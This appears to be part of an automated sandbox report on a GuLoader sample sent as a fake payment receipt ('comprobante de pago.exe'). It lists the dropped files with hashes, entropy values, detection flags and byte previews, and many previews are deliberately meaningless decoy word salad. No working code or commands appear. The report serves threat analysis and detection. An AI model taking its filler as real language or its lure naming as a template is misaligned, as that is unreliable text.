SHA-256:	173A5EC7D69D66541B95EDC9CFB99B7FF3AF054E23A1A1E022E790E5B7D7CB4E
SHA-512:	F068828483D7F03AF89BEA92715E4AA1B791685F3D6F8E132B97A1CDD8D9DD1257A9F2CFC184F956BB29A4FE697B099B192E07407A6DFEE38AFC351B455A50A2
Malicious:	false
Preview:	Skatteen dioders depuration hjulbenede meaningless..anraaber preliterate andst.Brodiaea periscian klauber containeren silens infernalskes dobbeltdomicil..Pestilens kollektivroman synodian holochoanoida interposes langhalmen zion,isaks tib pedallers forandringsprogrammer paraphyllium....Potage autocratical ordrebgers svigefulderes udfrselsforbuddene cicero,philippian forhaabningsfuldt avians lommetrkldet inconsumed..

C:\Users\user\AppData\Local\Temp\gypsoplast\witherdeed\Bddelkses\Halfman.ini

Download File

Process:	C:\Users\user\Desktop\comprobante de pago.exe
File Type:	ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	731
Entropy (8bit):	4.41760270489375
Encrypted:	false
SSDEEP:	12:H7mXwvgwAlwgiNUdgM+ZY/wZ2Lhwje99JRN2vJQxjNJyF3q:odH4uiMwZ2LhwjehRRNNyq
MD5:	F6AD6FD2E2FC5AC7356AE652D8959DAF
SHA1:	8C23B2232A7335BB7C3EFAFE061F4154B4D6DA22
SHA-256:	7EBB8D2B48EB1C49ABE85474DCD24BAA510AB73F8D3AEBAFD6A1E3479B58F03F
SHA-512:	3279622B160C28C6525A390065DCF03CB9119280179A7C761AF7A729E5E95741F883B51C489857573CEB3DD7A81AC90DAC6417180AD779BD89BC134776B0D5D1
Malicious:	false
Preview:	lifeskills desorientering natligt startklare monosexualities dameskrdderindernes inconsequences stockrider indifferentism udbindingens,skattefrit eksploderinger fortolkningsrkkeflgerne..Kalkulationernes englerstens trowlesworthite samtalepartnerne spegesildens artophophoria solicitrix,mediocarpal beskaering brugererfaringernes vibrant..[UDSKILLELSES UNEXCUSING]..Sejrherre penetrameter continency kvasedes byraadet citronsafters fnat brachyuranic daabsattesten....hundredal foresights prunetol paraboliform gummistvlerne krigsretters uranographist rigsblernes retreatist gennemkres,saddelmagervrkstedets kommodeskuffe groundedness afskilrer gldelse calibrating autoriserings skandskrifterne noncoplanar gungremosen succussation..

C:\Users\user\AppData\Local\Temp\gypsoplast\witherdeed\Bddelkses\Mordvaabnets.jpg

Download File

Process:	C:\Users\user\Desktop\comprobante de pago.exe
File Type:	JPEG image data, JFIF standard 1.01, aspect ratio, density 1x1, segment length 16, baseline, precision 8, 294x157, components 3
Category:	dropped
Size (bytes):	4405
Entropy (8bit):	7.816143653060702
Encrypted:	false
SSDEEP:	96:RhOE+C0vaZ3RcYhXZ4Hn7RhYYEswDZLh8K7:LO7EFVZK7RfEseh9
MD5:	A5ACF99197FBE1E11561839DB4BBD0A6
SHA1:	E61D440B225547F0EE5F722097BD9441B3A1C6C9
SHA-256:	D8A3D0702348E691F6356AB23AD9DFCE7B52E0A7EB75E2218D2440A9EFDB600B
SHA-512:	EC0D0E8A35F5573AA2E4F5A241FF326F06592C0B876A84ED2AEEFDCC8798FFE86CE3AEDC1D948D9CC8D6F307F973C20A19B533088D8C4F125C6374DAE1B2FB82
Malicious:	false
Preview:	......JFIF.............C................................... $.' ",#..(7),01444.'9=82<.342...C...........2!.!22222222222222222222222222222222222222222222222222........&.."............................................................}........!1A..Qa."q.2....#B...R..$3br........%&'()456789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz..............................................................................................................................w.......!1..AQ.aq."2...B.....#3R..br...$4.%.....&'()56789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz....................................................................................?..C....=6..B.......z..v.d.....\|.+...\.(.L..L..O..u...t....S.ZY.v......(.j3 ...R;......j.G..2W...u...b....\...V-@.0{SL.i.".X...........ZN.=.<!.@..).kD..0.....m[6........T.&......E.LT.i1@..S.F(..S.I..J)qF(..b..b...QE.[T$.V....UU.OZ....$f.+....{..I.......P..1....O.4..'...r.h..N..H....fvI.......e..1..i...SM<..f.%[Y.n5,h.......l.]s..P....v...'.As.:...tQ.._!Trj.0.-9Vi

C:\Users\user\AppData\Local\Temp\gypsoplast\witherdeed\Bddelkses\Preadmonition20.ove

Download File

Process:	C:\Users\user\Desktop\comprobante de pago.exe
File Type:	data
Category:	dropped
Size (bytes):	254988
Entropy (8bit):	1.2647683344346683
Encrypted:	false
SSDEEP:	3072:CD35q70qe4QVPlj0y1OAvGfBwl31QKCkoWjbNtg9W+23bGCY+8fozvq630OGFo0j:HAwwbZBp8
MD5:	1FE0670D7DA023E20D5ADE9285D56C12
SHA1:	B7DD4195470223B68942C1B2DA94823C6DB8BF67
SHA-256:	C638FCE2B6A7F1CC785089F7BCEEB0ECBE3AAC672994FED54BE2EEABE14C91B1
SHA-512:	9C6CC71DF9435F039C2CBA8BE749B2366B3CCE95BFE3D5A3BD11E13ADFEE92A0DA79E10AF147959A4D72413F35454246D172F4D6D2FE74B232F7D7F009898C60
Malicious:	false
Preview:	..................I..........................................:......7..................................~..P........../...................................................................................................,............................................h....................................................7.....................0...................i......................V...............d.......0............V................................<......................................\|.>.................?....................V.............................x................P...................................................................................................X......................\|.............q."..... ........................................................i..i..e.............................A.^................................&.k....:.....L...........J......4..P......................:..............................."..................................................-.......

C:\Users\user\AppData\Local\Temp\gypsoplast\witherdeed\Bddelkses\Tonation.jpg

Download File

Process:	C:\Users\user\Desktop\comprobante de pago.exe
File Type:	JPEG image data, JFIF standard 1.01, aspect ratio, density 1x1, segment length 16, baseline, precision 8, 578x474, components 3
Category:	dropped
Size (bytes):	21699
Entropy (8bit):	7.926675255360166
Encrypted:	false
SSDEEP:	384:Xvs9Mnh+JtrISqaH9FDkfcu+q6eo4zAoApd2GWpBED5DnfDWKh4cJwhSAEW2n:XkynIkSqanAfcu+q1/Apd2lp+DpBJwhw
MD5:	D67BCA7A20D8E99630887F04B2CF82F1
SHA1:	B83D56E948FC697398FA88DE635B8BF6683EF170
SHA-256:	97A96784FAA7D0C13326B8FC3FE600FC9CD2B7F20383B7019F3FE5892D6BF707
SHA-512:	E060EB45C0C9CEBF5A9F5A9BDD3ADA767E1FB15B24D6B7DDD4B34F40BED429DD04A4B6F0E75DF1B300851C17079F93F8D2BFA23BD1D8C00080F0A25BFDAEF75C
Malicious:	false
Preview:	......JFIF.............C................................... $.' ",#..(7),01444.'9=82<.342...C...........2!.!22222222222222222222222222222222222222222222222222........B.."............................................................}........!1A..Qa."q.2....#B...R..$3br........%&'()456789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz..............................................................................................................................w.......!1..AQ.aq."2...B.....#3R..br...$4.%.....&'()56789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz....................................................................................?....(...(...(...(...(...(...(...)qL.....J)h......J)qF)..R.L.......R.P.QE-.&(.;.b...)....)qE.%.b..(.....R....\Q..J)....)...%.....%..P.QKE.%.b..)1KE.%......(..E.P.E.P.E.P.E.P.E.P.E.P.E.P.E.P.E.P.E.P.E.....(...)h.....P.b.S.F(.....(..7.b..1@..(.....6.S.F(.1F)....Q.v(..&(...(..S.F(....?m...b....b...1N.K..n(.?.b...\S.F)..Q.v(..3.b..1@....b.P.qI.v(. ..1N.&(....I@.IKE.%........

C:\Users\user\AppData\Local\Temp\gypsoplast\witherdeed\Bddelkses\Vuggevisens.tid

Download File

Process:	C:\Users\user\Desktop\comprobante de pago.exe
File Type:	data
Category:	dropped
Size (bytes):	69623
Entropy (8bit):	1.2519681529178104
Encrypted:	false
SSDEEP:	768:ot9YUxkaybcwogonFGRoonf+GFky65/30AswsQb7g:otKUiQXg
MD5:	493AA3704B5232691C85908AF19F84E0
SHA1:	99F474E6BD3C60DAC4909CC481371C1F497C6820
SHA-256:	D33B80A108091D8BC7042D55AB4A9927432CA6F265FFBF29008BB3170093105A
SHA-512:	0D095DBCC03C8F6A35E3363287E9EEE031666C78169E8148C73288A3E1DE8DD9125970FF9435C454AA455444C4143A8DEA4C4FF8F4A32F8EE26704ED32FA91C3
Malicious:	false
Preview:	..................I.................u................;.................................................Q.......................G......................................a.............................I.........o...............................................................L.....................................................F...............................z......................................X./....................................................D...........................................................................p....................................6.............................................W...................................U.........................................Y..s....................Z......j.....................................................................................r................................................9...m........]..................................................#.................s...%.........v.................E..............

C:\Users\user\AppData\Local\Temp\gypsoplast\witherdeed\Bddelkses\alderney.jpg

Download File

Process:	C:\Users\user\Desktop\comprobante de pago.exe
File Type:	JPEG image data, JFIF standard 1.01, aspect ratio, density 1x1, segment length 16, baseline, precision 8, 457x371, components 3
Category:	dropped
Size (bytes):	11818
Entropy (8bit):	7.847528771430427
Encrypted:	false
SSDEEP:	192:LwvFQCBGfqbL48QwHPSBnb/1nMhMBbu4SXHCjRnIfvKf1upR26SN/YQuQeKhSH:0NBZR/vEb/Z6MI44Hu2vKfcq6SP1tO
MD5:	94C27DA69D8CF7BAFED019A3FF0F5FDF
SHA1:	60EB84014299E3999B9CFFE52521AB994DA52925
SHA-256:	8B49181F164C4C0DC270CFB063507A03E6F73ADEB3242EC152291341A671EAAC
SHA-512:	C77E4C9995F959B7D125AA5D828FFBABC9A5485DC28CA1DC9D10A39C3D89A62370A1FDC1888E68F2FBD5F0E275127CA23ADF7AB7094A57EFF56EB3A9375DC736
Malicious:	false
Preview:	......JFIF.............C................................... $.' ",#..(7),01444.'9=82<.342...C...........2!.!22222222222222222222222222222222222222222222222222......s...."............................................................}........!1A..Qa."q.2....#B...R..$3br........%&'()456789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz..............................................................................................................................w.......!1..AQ.aq."2...B.....#3R..br...$4.%.....&'()56789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz....................................................................................?..J(....)h...(...(...(...(...(...(...(...(...RQ@..J\Q@.KE..QE..Rw...h.h.....Z(.Rb...(.....R.@.F)h.........b...(...(..R.1E-..J)h......J)qE.2..(.QE..QE..QE..QE..QE..QE..QIE.-%-.......(...(.....Z(.1KE..SGZu4u..QKF(.QK.1@.F)....b...LQKE.%..P.b.R.@.E-......b..\Q..m........(..S....N.%.2.(.HQE..QE..QE..QI.(.i(.-.%.(...(...(...)h.....P.E-............Q@...}._.@..Z.-...Z(.(....(...

C:\Users\user\AppData\Local\Temp\gypsoplast\witherdeed\Bddelkses\assuranceselskabets.jpg

Download File

Process:	C:\Users\user\Desktop\comprobante de pago.exe
File Type:	JPEG image data, JFIF standard 1.01, aspect ratio, density 1x1, segment length 16, baseline, precision 8, 342x686, components 3
Category:	dropped
Size (bytes):	60376
Entropy (8bit):	7.971324380544427
Encrypted:	false
SSDEEP:	1536:7HhutAeLui+X0e2gChrxevJbvj/1BAzTIR439wd:tuyKkJCrevJX/1sMa9wd
MD5:	4C1D54C8A4903B6F12DF1A3C60D7385A
SHA1:	3B56BF989C80882528401DEDF9FF2BC7743EBC9B
SHA-256:	9E091FEF3FA9C99BB32C868CAE266CDF79A37DC9C0FA1B83A33E59FB45ABC71D
SHA-512:	34BA1AF75C53EFA42FCFD4C448D09815FA2F42228DBEAAE24DBDDC8C8492E89202C00CC9C018AC3978B8756A48A5D3749EEC9A8051E187E217DBA965B2DB2AAA
Malicious:	false
Preview:	......JFIF.............C................................... $.' ",#..(7),01444.'9=82<.342...C...........2!.!22222222222222222222222222222222222222222222222222........V.."............................................................}........!1A..Qa."q.2....#B...R..$3br........%&'()456789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz..............................................................................................................................w.......!1..AQ.aq."2...B.....#3R..br...$4.%.....&'()56789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz....................................................................................?..[X<...).%....?..ak.D...8.......R$.DbW@.. ..H.....R.....G..s.9?A..:.J..OR..Bn..VH........T....&A...J.u...=.P....n...?.d.+<r..ibO.....M%..q.&Y....G.U.d.U).)' ..3TQ.e...j.dQp.....Ej...W.....9...A\.x9.....<.w.jv.,....K.H.1YR..#''y..X..c....3..[t.%.,p...n..q....5j.....9.+*.c.U.?h..Llc.@.\|.......g..^T.'.L..=I.Y.+.1.B@.8....o...E........{..8...)..K.%.......~..

C:\Users\user\AppData\Local\Temp\gypsoplast\witherdeed\Bddelkses\coater.jpg

Download File

Process:	C:\Users\user\Desktop\comprobante de pago.exe
File Type:	JPEG image data, JFIF standard 1.01, aspect ratio, density 1x1, segment length 16, baseline, precision 8, 278x191, components 3
Category:	dropped
Size (bytes):	8234
Entropy (8bit):	7.936187932906053
Encrypted:	false
SSDEEP:	96:RhoEpmbOFMt2NhCe+dmttdphAOr4uJiGR4pk9UQ+ZCq8+3Q7r8ymwalE24uqF65k:LoWBFzDgd0VTbJWk9UrZuRPx9u3zHoB
MD5:	A1C97C1DCC9A752FD66521B1E6E210AC
SHA1:	5E605C48AAF516EF5B952F5960005D83A3B78579
SHA-256:	A41EDF17CED3023EDC8ED596B3525621F626F94C4D4586047C68D4E82E35B308
SHA-512:	0666F8262B704E533DD3A116E670B92780A7108BEDA97D967B36D008C15D60DBCEA812F34C84CE001829C79A74E0302D3402C11B6EABDB08CE421594B5F5B6D2
Malicious:	false
Preview:	......JFIF.............C................................... $.' ",#..(7),01444.'9=82<.342...C...........2!.!22222222222222222222222222222222222222222222222222..........."............................................................}........!1A..Qa."q.2....#B...R..$3br........%&'()456789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz..............................................................................................................................w.......!1..AQ.aq."2...B.....#3R..br...$4.%.....&'()56789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz....................................................................................?.....A.dUh.p...~Y.;{io.Y#.aq.\|..=~...[H..N......#8...\.....X..i<.....Gn[i.3.{{....S.....g-?..X..<.....O..u.:..R>...Z+Z.....T.....q\........W2F..=...SR.Z.......Q..T....5(L.Wn.....;.......P...j..".W.....V..:.6s.P.....@.@.Ze=..#....n85N@f.gD.{..gL..ng..2d3@.uZ..5d:j^.k..WPEGk}..e.g...=+.T....Y.J+..!a?..c...zg..^.U..v...K.p....#.:s.[ac.q.....fn.Ui-...f....B

C:\Users\user\AppData\Local\Temp\gypsoplast\witherdeed\Bddelkses\consolute.ini

Download File

Process:	C:\Users\user\Desktop\comprobante de pago.exe
File Type:	ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	399
Entropy (8bit):	4.362629848488066
Encrypted:	false
SSDEEP:	12:3ENyFXjSdTK8KjsY+f3tL8l3e7mWo8Y3UQVW:3LFXOasYAto8ob3hW
MD5:	58783A1CC968DD4D81913845DAD80AD0
SHA1:	B2070585C3AA6125F4EC285EE6A6C32BA28BD278
SHA-256:	9F45C639D0BCFAAB3044C4E03BFF984B5A46DC11835D1A85677EA774EB545012
SHA-512:	A10A0263B1380EE95A03365FC3CB863F123D9A575D89DCDEC147BA8D5A96E85BD48D1A5984FA0F152CBD7A45EA00A2961FD0D6FF4CFA170D6B6C206DFAA5CB5A
Malicious:	false
Preview:	[makronavnene polyphonies]..nutmeggy nonaromatically comourn dumbing.Relegeredes strop presennings concelebrations cholanthrene flskesidens..;stedordsagtige offerlammets fuldbaarnes,mannequiners testamentsvidnes ubrugeligere..Debs girokortets conceivably,katetometer potentiellernes supersuspiciousness..Benovet cornucopiate pectoris chillagite datoformater villighederne burgerbarerne terriners....

C:\Users\user\AppData\Local\Temp\gypsoplast\witherdeed\Bddelkses\doughfaceism.jpg

Download File

Process:	C:\Users\user\Desktop\comprobante de pago.exe
File Type:	JPEG image data, JFIF standard 1.01, aspect ratio, density 1x1, segment length 16, baseline, precision 8, 350x318, components 3
Category:	dropped
Size (bytes):	15682
Entropy (8bit):	7.957732460112156
Encrypted:	false
SSDEEP:	384:6ynMlZSJIZiYUNbLtYeOmqt/h17dcrRXtvskGe8Vu0NXu:6ynr2rGHCrm8Z1CNskcRXu
MD5:	9BB75CCC92EA84FE84A6BEF65B0EBE1D
SHA1:	F182D90A8A69ABD17F87F1BFE894981A40578C41
SHA-256:	565F372185FCB22AABE2FE5D65FDA0E6D2B241296924A3A911B251510C38E206
SHA-512:	B6D05B97DC9DF1B4603D5415A68BDFE18D22DC76F9D28683227BDD330FB54E6A70E5E30AE5A31F885346CE3BD1F7773B413B29031BCC371531932C6D7E0C96E0
Malicious:	false
Preview:	......JFIF.............C................................... $.' ",#..(7),01444.'9=82<.342...C...........2!.!22222222222222222222222222222222222222222222222222......>.^.."............................................................}........!1A..Qa."q.2....#B...R..$3br........%&'()456789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz..............................................................................................................................w.......!1..AQ.aq."2...B.....#3R..br...$4.%.....&'()56789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz....................................................................................?...xj.\:...N..2pi...S.......}..O.F^Z..QJi(...R.,B.$..w.CqLy.%,..+R=...%a.?....Z..'..........CEM....3..pO@.2r......v........T....8..Y....J}..x?.f.j..>8...8o.l\.oX.$................... j.=RU....F+/O8...)5..<...q.....KY....a...<.~.....z[(.@..y..$..I.R.&.....yo.......l...{t...4.P.qC8Q..Q......@..0.0h.#..J..8..P(.....3.Z..H..<6.9<..."..m..:..5i".:T.....O?JW.<+..

C:\Users\user\AppData\Local\Temp\gypsoplast\witherdeed\Bddelkses\externomedian.jpg

Download File

Process:	C:\Users\user\Desktop\comprobante de pago.exe
File Type:	JPEG image data, JFIF standard 1.01, aspect ratio, density 1x1, segment length 16, baseline, precision 8, 422x543, components 3
Category:	dropped
Size (bytes):	17929
Entropy (8bit):	7.897905434786395
Encrypted:	false
SSDEEP:	384:qMVi5Kz9S8zEGkVXtkMIZdeUzH/rdGLkCx7S/aTVq9cB:qMVioz9IGkVKXeUzjdGcCx
MD5:	D4D9C90B4F5144D306B262B4EE3996E7
SHA1:	82E2A0031A3EA7C52C3FCFEA73C08C927C878ECD
SHA-256:	D69D9FCE974E7C61D7E2C863781F7166F852E87D8C1D518492ED92292C38212D
SHA-512:	7A8C2BE9AD3C57449D2D0FC7D212E7B8DC926169802B59BC630FB3A1459546473166474C1214CFBC652017C187226651C491FB8A73ED80C8E00BDC9A7893FB5D
Malicious:	false
Preview:	......JFIF.............C................................... $.' ",#..(7),01444.'9=82<.342...C...........2!.!22222222222222222222222222222222222222222222222222..........."............................................................}........!1A..Qa."q.2....#B...R..$3br........%&'()456789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz..............................................................................................................................w.......!1..AQ.aq."2...B.....#3R..br...$4.%.....&'()56789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz....................................................................................?..SO....]..A...Z..5,.YSR!.A.T.."e.v...&P....4.@..<qR7".H.v.....f....(8.T..RZ%..:.@..D.x..Q....h.M>...i.x...u.-&iM2..4..Q@.K....p.M..@.).)..-8RR.1h..4..RQ..J)..@.p.....^. ..U.}?F..:..6....V.$..2.8..7....f.M7.....L......s......o....X..n......`..x9........B...g `.c'.p.Hc.qC..........u9d.Q...0;p;b...+x..9.H...=h.f....<..q..8.N..5 5.v..R..GZ.jYH...SU...y.f...I.

C:\Users\user\AppData\Local\Temp\gypsoplast\witherdeed\Bddelkses\flannels.ini

Download File

Process:	C:\Users\user\Desktop\comprobante de pago.exe
File Type:	ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	724
Entropy (8bit):	4.327317806978043
Encrypted:	false
SSDEEP:	12:nalWl27L/9h2ENEBrZL+3MsqQfrXdAFBCRXfrtVfjODJj9MHbYv:alrDSENEBrZLjpQD9RTKDVSbC
MD5:	E7851126AE404A3DE61B290FEA3EB31F
SHA1:	B6B4A9C983D728B8C81AB605A536E76EF305CC65
SHA-256:	3A2245179F82577B505F0BAE71742B3509600E37DAB5337FC2C20179917A3EC8
SHA-512:	508C2190B84FDE7447ECD7B60FB91289C4A781C00D7D9992957DADDC27544698FB36B3EADB4D6B8C7B34963843527CF2B6E22A9CC20F4F33315D5E24DB3582EB
Malicious:	false
Preview:	skeletonised stykvis afviklingstidernes rationaliserings konfunderes heroicomical tanghan.Padishahs reversalfejlens serieswound datadelenes farveinstallationsfiler selvbetjeningslokalernes medhjlp..nglefelt uoverlagtes tendingly costbenefitanalysers butternose skoledagene unaccordance craniopagus doorhawk mynternes defiliation,victor slikporres polonese..;prgtige morsomhedernes kabareter variegate undfangelsernes associating dommerstemmerne.Medullas filmgenrens beslave tetrazotize kalibreres sclatch pyrometry..Cavemen fasankyllinger recompass psykopater compoundable deorganization vanskbnens,udfrslernes violins trachyandesite..Natlampe bryggerens reactants udkantsomraader herls forseglinger folkelivsskildringerne..

C:\Users\user\AppData\Local\Temp\gypsoplast\witherdeed\Bddelkses\fremskaff.ini

Download File

Process:	C:\Users\user\Desktop\comprobante de pago.exe
File Type:	ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	581
Entropy (8bit):	4.393322273477235
Encrypted:	false
SSDEEP:	12:4KXVwXAELOq2XsSxD/A3JrYFNXU1NZza06g8r8wC1mho1VaK:42V0tOq2X/I3J8NXyNZR6gTUieK
MD5:	4C6BBB918D7F854ABDB7C44590D39BD1
SHA1:	F035153459E8433BBD7FC8CA8B68869F4F09C950
SHA-256:	0C85A2CF95FD3BA21E34B761863A4FB507E3CC2FCEAC67295513907BF25C9022
SHA-512:	5F66BBD21E1A80E38430E7AC6D7CCF5B4A18DB8EA4211F55ACC988C32BA27A7E4ED6FB644B8F47F5D86B83E6118DF28A5669148846A903FD80E8992E5CA51D00
Malicious:	false
Preview:	;nonhomogeneous bathochromatism stren.Richert antiwhite slagsens segment macintosh exerciser diminuendoed..[udskrivningsproblematik chirrupy]..aargangsdeltes misdealing dichoptic akvatinte arrestationerne immensittye.Chromed havnearbejder pyroxmangite spioneredes gauche svandt..underprize transferens calvinismen brugerbehovet.Matara brugsbevgelsens strandsneglens opdagelsesrejsens jordtilliggenderne......Udrmningers nabovirksomheden massakrerer perilymphatic fjerdingvejs diachronically desmoscolecidae bilskrotning tillukningernes appeldomstolens naturfredningsforeningernes..

C:\Users\user\AppData\Local\Temp\gypsoplast\witherdeed\Besvrliggjort.Van133

Download File

Process:	C:\Users\user\Desktop\comprobante de pago.exe
File Type:	data
Category:	dropped
Size (bytes):	355521
Entropy (8bit):	7.668315355704074
Encrypted:	false
SSDEEP:	6144:hTTWvzFKvVMVn9jiqpJ9t5dFgf1BXzED2Bk2q2cOl:5a7FK6//h54f1NzE6B6e
MD5:	B309E0C56E116CA4BB506532D3301D26
SHA1:	DD262120AFF0DCC56CA5C142DFE9A2E0C5A754A6
SHA-256:	F32F4655AE63807AF3841E5B4F806B4CAC43CC993417FC74FF0403E8037EFA39
SHA-512:	0976FA442E5BA759922F738CC0AAD568573B88D941A6B1D5CF9B09643566B59736C69D75AD20F7B73C35BCC0F602E498C4498C32A7C3273A7E4729701FF2A1CB
Malicious:	true
Yara Hits:	Rule: JoeSecurity_GuLoader_5, Description: Yara detected GuLoader, Source: C:\Users\user\AppData\Local\Temp\gypsoplast\witherdeed\Besvrliggjort.Van133, Author: Joe Security
Preview:	........{{...................zzz.pp......66......j...v.........i.................................CCC...............................{.._............................:.................==......,,.........((.............................T..............hh.ppppp.w........................33..{.....M.............88888...y......b.......................v......(...................................................HH.cc.o.....VVVV.VV.(((......................................gggggg........::.......................................uuu....XX............i....D.AA......tt..............111....\|\|.................@@....7.U.............UUU.........4......................66666.......................QQ.........................&&&&................XXXX....,..rr.;.....5....................................OO.......jjj.......AAA.5..............[[[[...... ..s..7....yyyyy.eeeee...nn..........xx...............44.pp.......cc.)).B....NN...........'''''''........2........\......................00..............u......nnn...

C:\Users\user\AppData\Local\Temp\gypsoplast\witherdeed\Glossologies\comprobante de pago.exe

Download File

Process:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type:	PE32 executable (GUI) Intel 80386, for MS Windows, Nullsoft Installer self-extracting archive
Category:	dropped
Size (bytes):	839098
Entropy (8bit):	7.574745660362048
Encrypted:	false
SSDEEP:	12288:1gP0I82X5K+GDnvy1eSLR0lUEkyZtyj6ittqTH3oEuprboHlExvyBBApy2HIxod3:EFJsDnylcpZk64oYEGc+yTARioCLC
MD5:	969DA5CC61A21E2D5FD00A52254ECD8E
SHA1:	3F3CB9FDF47343F8E4D88E5171AD3B57ED6C4BAD
SHA-256:	20DC4FFC31F978E2C822878B11A4D59C3AD6DA9898A7028D75D3C9079598DE18
SHA-512:	6DF74D8E45B5DB927D8962E453F379B18BA79DCE91A8E0677B55A36C1A57F38C43F677091D280D1ABCBCAD2B214299AEB02F2784047411E2D62A6E0912556E60
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 16%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........1..P...P...P.._...P...P..OP.._...P..s...P...V...P..Rich.P..........PE..L....z.W.................b...*.......3............@..........................0............@.............................................`............................................................................................................text...]a.......b.................. ..`.rdata...............f..............@..@.data...8............z..............@....ndata...`...............................rsrc...`...........................@..@................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\gypsoplast\witherdeed\Glossologies\comprobante de pago.exe:Zone.Identifier

Download File

Process:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	26
Entropy (8bit):	3.95006375643621
Encrypted:	false
SSDEEP:	3:ggPYV:rPYV
MD5:	187F488E27DB4AF347237FE461A079AD
SHA1:	6693BA299EC1881249D59262276A0D2CB21F8E64
SHA-256:	255A65D30841AB4082BD9D0EEA79D49C5EE88F56136157D8D6156AEF11C12309
SHA-512:	89879F237C0C051EBE784D0690657A6827A312A82735DA42DAD5F744D734FC545BEC9642C19D14C05B2F01FF53BC731530C92F7327BB7DC9CDE1B60FB21CD64E
Malicious:	true
Preview:	[ZoneTransfer]....ZoneId=0

C:\Users\user\AppData\Local\Temp\gypsoplast\witherdeed\Glossologies\swellfishes.ini

Download File

Process:	C:\Users\user\Desktop\comprobante de pago.exe
File Type:	Generic INItialization configuration [ERSTATNINGERNE PRONOGRADE]
Category:	dropped
Size (bytes):	391
Entropy (8bit):	4.655897453888685
Encrypted:	false
SSDEEP:	12:G1xGvLob7CsTDzlvQDR3WFu0smqKa1MPx8QVr:WxKEnCOK3cVRjJ8QVr
MD5:	9EA503498EF15FF64A7C82CA5F52D574
SHA1:	F0C5F5A8E712B93D7C9264D6A8D6DECDADF4A270
SHA-256:	8B685B514F1FFAA676EBC57F4D2403C097FEFF95091DC5657DAD9398AEFDBA77
SHA-512:	84CEA81CA38BF2B78651DB867A2B97F77B018454547571E875F186DC9363A66218E6F7663511D52BCE7F19FE3FE69870CBB73D7882DF6A469602D1841AB75D01
Malicious:	false
Preview:	[arbejdsmaades catagenetic]..;caschielawis smsyning homopat.Vividity skkelrreders glyoxal dyrplagernes unreproached......[ERSTATNINGERNE PRONOGRADE]..ryggeslses oldies solitrplanterne toupeers gangliglia sitient cyklings auksinas amphophile tinbergen.Glemmebogens dobbie skabsgange feltprovsterne bidselspndernes deltastraalen simuleringen symbionticism netvrker magasinernes solitrskaks....

C:\Users\user\AppData\Local\Temp\gypsoplast\witherdeed\Glossologies\trebucket.ini

Download File

Process:	C:\Users\user\Desktop\comprobante de pago.exe
File Type:	ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	414
Entropy (8bit):	4.289899766669852
Encrypted:	false
SSDEEP:	6:FhC4XNHNX7QM7XuQvTuLLQn8A+JY5b9lEVQpsfbmD0WKAAkCsQBM4N0CBZudGuga:FT7dXu0TqLQnYJVQObDAnXUHPBGrr
MD5:	C864F4294BC5B56B60AD69BCF408841E
SHA1:	2E4CE7FE1300E5590A29C452DFBD1BD51CC7D444
SHA-256:	ACB016DEEEAD1ED1C9D6BE0406F573D81DA854BD570D7CA409594D06A5AC953D
SHA-512:	1482F9A7E970DC53B887C3679C525EB26BF0183D20B46189F6174BBCC1C6183FE567411DF7863184E0C2D08C8F74A1DF5EF404F98B48D8FA29A39795BE1AD614
Malicious:	false
Preview:	Backgammons valdrappet bruttoetageareals,stakit ekshibitionisme relernes degradhvr annekterendes......entertainments psychiatrical anmassede hockeyspillernes antifundamentalist,overpunched stenkulsnafta desilicating rejsnings alabastron irrational efterrets udenlandsrejserne..Thigmopositive kbesummer bination rdselsfuldest unspeedy lokaliteten duchess actinopterous elegising gwennies aartusind turtledoved......

C:\Users\user\AppData\Local\Temp\gypsoplast\witherdeed\Glossologies\underetagen.tas

Download File

Process:	C:\Users\user\Desktop\comprobante de pago.exe
File Type:	data
Category:	dropped
Size (bytes):	413864
Entropy (8bit):	1.2564334050792323
Encrypted:	false
SSDEEP:	1536:BQbZ6McGlBAhCrD1ORROW2eOruB7QkzW3XoT3mrMK0Q9gPRKJbkLDf3hogZwiZYA:s06ozb20/Xy2iBQ6B3a
MD5:	EC566901FF4B6397B964A9CFD19413F1
SHA1:	8DDBE78E52F2CC5123DD0B559B06FAB3DD526E1C
SHA-256:	2138BD467A686F63CBFBDAA992B62A1B60AF22192285765BAA5582B7572A9DCC
SHA-512:	CF7F2FC3C4D72C9CA5F4F63A6DE24FDF136FC568CD110184D92A8E89E15DAA10A3F1759DDFF90B1EC7752DA90847E0BC3FD3015511C4F19E84A055762CCB69AA
Malicious:	false
